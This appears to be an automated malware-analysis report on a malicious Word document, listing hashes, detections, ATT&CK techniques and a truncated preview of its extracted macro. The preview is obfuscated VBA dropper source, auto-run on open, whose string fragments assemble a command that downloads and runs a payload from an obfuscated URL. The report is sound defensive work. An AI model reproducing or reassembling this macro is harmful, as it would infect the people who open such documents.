Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 33b223b8e4a233d0…

MALICIOUS

Office (OLE)

Size: 110.5 KB
Created: 2018-02-15 19:41:00
Authoring application: Microsoft Office Word
First seen: 2018-02-19
MD5: f54cbde73ee9a1cfb6e3d60d3405bf44
SHA-1: 64c8cd542b9d64f0974ec88e15b196eb3434a113
SHA-256: 33b223b8e4a233d0c7945f533037808e13289a1d813de4e376766ddef64543fb
Risk Score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1059 Command and Scripting Interpreter

The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro utilizes a Shell() call to execute a command, which is highly indicative of downloading and running a secondary payload. The reconstructed URL 'http://wTpa+Tpaww.Tv9+Tv9abTv9+TTpa+Tpav9pFI' is the likely source of this payload.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6450781-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6450781-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://wTpa+Tpaww.Tv9+Tv9abTv9+TTpa+Tpav9pFI (in document text, OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 28112 bytes
SHA-256: 609406fd08f60ca7b5423c8cc03975cfec3e604b39754a97baec3fafce369ab8

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "EOTSTIwHabwwUz"
Function OEKOZOftjna()
On Error Resume Next
wSmKRjzrzwu = (fAopwvZrl - Int(iEdsaENtur) * HCbhbHDslm / Oct(uwQNiu) - (qjnMslCYQhwsf - Sin(7155828)))
pzSsT = (sYwNIXnVw - Int(oVKhb) * ZSwDLqu / Oct(pfDqVu) - (GXVDsPRlXCKoM - Sin(891869)))
BDvmsG = (rqpUZZjh - Int(BdpXdUz) * EHhwo / Oct(jzHhbBBCiE) - (nMBAUTapI - Sin(337610)))
QSXIjma = (CJIDFYfQ) + HJjkJKD("dlRJSVL9extTv9+TvgMc+gMc9(10000'+', 2'+'Tv9+TTpa+Tpav98213Tv9+Tv93gMc+gMc'+')Tv9+Tv9EJzWRtawtAChaJTQhTiontXttLC", 8, 77)
FiXfZINGnQW = (EjLzvkzpHvzkn - Int(IfcUWN) * YvrSchIkz / Oct(dCbVJzCTpwSvJK) - (RPIXkkAETjkUjS - Sin(636141)))
NoRHPXFo = (FIzVhLmziZBh - Int(FdljSKSA) * OLcwHoY / Oct(VAmHNmKoSG) - (IoLjTmNCzn - Sin(2661863)))
ZGwkf = (losuot - Int(EzbFEBuJsqb) * AEpsYCbJMtmYp / Oct(sBTUrV) - (jBfjjHhYdVLYwN - Sin(649222)))
ZTPzstzTlfo = (WRDNFXR) + HJjkJKD("sEKjTwpdstVpa9mTv9kzVIRCMT", 12, 7)
wtszuwAEkoB = (iYaAtuoFXAAJ - Int(NrTiUKX) * nzMSzwAllf / Oct(SwnlkCWBUoSXww) - (DLqjUkWGvbN - Sin(6475596)))
wuShPbVFFsF = (zoTmUEqNZFicz - Int(DqUZOW) * tovELKws / Oct(KXUcDjUjDtFWd) - (HEWbTQ - Sin(5137773)))
iGdBNMjMdbw = (zKdEz - Int(iJtuVhuLH) * FWVoWURsP / Oct(nzojcbRJXJw) - (hwwuALBwKvzBVz - Sin(9038604)))
jHwkaLMnJTw = (wFwQCKLovu) + HJjkJKD("RBUiSJRnJhmvwz+Tv9Tpa+Tpam/EyT'+'v9+TvTpa+Tpa9gE4Tpa+TpaTTpa+Tpav9'+'+Tv9N/?http://wTpa+Tpaww.Tv9+Tv9abTv9+TTpa+Tpav9pFI", 15, 103)
QCwllRnUib = (GrTYsBnN - Int(jfdsPOKRMPZ) * tIhZHzfPIWwC / Oct(ntVsrhj) - (lMkHviIwXLaCiM - Sin(6620418)))
uhOpcVZ = (zkCHzXKibhcU - Int(ZUissHwwRMQX) * kKWAjbLj / Oct(HiZzNBCjOGnIw) - (rJmElphYlkimz - Sin(2197064)))
tVXqIi = (ABIEjNDTsu - Int(ukzKjLmTiquWZ) * LisoUbBqFOFfD / Oct(inptKruz) - (aATAjjkFij - Sin(1872010)))
oBNkhqMWR = (lowWGoYpc) + HJjkJKD("hKbVfTv9gMc+gMcVenTv9+Tv'+'9v:Tv9+Tv9puTv9+Tv9bTTpa+Tpav9+Tv9liTv9+Tv9c + I39VWKTv9+Tpa+TpaTv9IT'+'v9+Tv939 Tv9+Tv9+Tv9+gMc+gMcTv9 XwVNgTpa+TpaMc+gMcTv9+NsCuozwJwNZGhHtGmLzcvaSAKvr", 6, 148)
jwwjhQnKtK = (izNHRoB - Int(VKVIavuzzd) * VrwqTrV / Oct(MjrpjESBJHWtqW) - (XtIbiINXpNpfU - Sin(6901614)))
CHwwpdSujCz = (uPwrpu - Int(UmDIukpcjU) * zazKQqnwIBbtZz / Oct(ANGwwhzu) - (WXWOdhMdV - Sin(6296514)))
vOWAnE = (JLjzGEqlb - Int(tdKdjbVnVRCjY) * sUYVbpzYscHo / Oct(HqtrLSjduM) - (tFqqzPSdnuGl - Sin(6129904)))
ckhnSdouZ = (EHUpqAB) + HJjkJKD("YYnLSwOfpa+TpagMc+gMc9'+'-ItemI'+'39)(X'+'wTv9'+'+Tv9VTv9+Tv9SDTv9+T'+'Tpa+Tp'+'avTpa+Tpa9C)Tpa+Tpa;Tv9+TTpa+Tpav9brTv9+Tv9eTv9+gMc+gMcTv9aTv9+Tv9k;Tpa+T'+'pa}catch{}'+'}Tv9)  -c'+'rTpaTpbUqIJLJjzcrLhJaJoarGJAnMk", 9, 177)
aNbjiAri = (YdKiBj - Int(EOXAf) * IJiPwIctXqbP / Oct(iIdsroonwHXqtN) - (sNCphHD - Sin(7930460)))
wBiBqzw = (XdNVOAniPF - Int(saVfM) * zMBHZEuPAKomh / Oct(fSAUNbSZvUpa) - (NURrWdqKroWw - Sin(4807918)))
jioliusJAVu = (GNqzwiRV - Int(aBSkZXRjS) * QhuiSRIrdoidVo / Oct(MLEVts) - (rurqDtRma - Sin(1497162)))
VtAOOuULQn = (OzbZqNsLwIncVw) + HJjkJKD("kdSwwRUCnzUAluskzQ TfccIhvKYkAfXhor+Tv9asfTv9+Tv9c.lTv9+Tpa+TpagMc+gMcTv95eTv9+Tv9ToS'+'Tv9+TTpa+Tpav9tTTpa+Tpav9+Tv9rvWTv9+Tv9EivWTv9+Tv9ENgl5e(Tv9+Tv9), XwVSDC);&(I39ITv9+'+'Tv9nvoTv9+TgMc+gMcv9I3Tv9+Tv99mWAi", 36, 171)
YuBzi = (LMKZFup - Int(rcOPZ) * OXZVjVAjfoFBi / Oct(zuKaQEb) - (zfuNwLn - Sin(9334291)))
BazpfGtXEcK = (YRzSXWKw - Int(MihVTD) * iAwRnwV / Oct(BZuaSYos) - (VjklsbXzdJr - Sin(9273309)))
XEzAZS = (bLrCSLrifZv - Int(RwckiiXmwzn) * alYYSJpd / Oct(VzjiQGdA) - (qGpEb - Sin(5742031)))
rksTWsfdm = (hnrnjuwjdc) + HJjkJKD("TKQ9+TgMc+gMcv9+Tv9'+'ITv9+Tpa+TpaT'+'v939eTcHrzfhqEiXbN", 4, 41)
ulOjhYQv = (tJjdWKucDKOK - Int(nWLKoZ) * hsUWXqfdCNlzZ / Oct(nSquFWsrI) - (VHEHihr - Sin(4818192)))
hpNIAFYQmJ = (EDBpK - Int(fiQaqZ) * kkADUPj / Oct(wqkJA) - (mXzVWMzV - Sin(4075706)))
PTrsBJfijOI = (cjoZrbQRlGWT - Int(aMbpzG) * RjJqtGR / Oct(UMRPP) - (bobKLWZ - Sin(3546629)))
uzRKVTBbNZw = (kRNvAtBNbu) + HJjkJKD("DzZOkbbdI
... (truncated)